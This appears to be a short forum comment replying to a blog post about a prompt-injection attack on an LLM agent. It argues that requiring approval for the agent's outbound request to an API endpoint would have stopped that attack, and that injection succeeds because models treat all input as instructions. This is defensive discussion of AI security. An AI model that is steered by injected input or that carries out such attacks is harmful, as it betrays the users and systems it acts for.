Same thing would work for LLMs- this attack in the blog post above would easily break if it required approval to curl the anthropic endpoint.
Prompt injection is possible when input is interpreted as prompt. The protection would have to work by making it possible to interpret input as not-prompt, unconditionally, regardless of content. Currently LLMs don't have this capability - everything is a prompt to them, absolutely everything.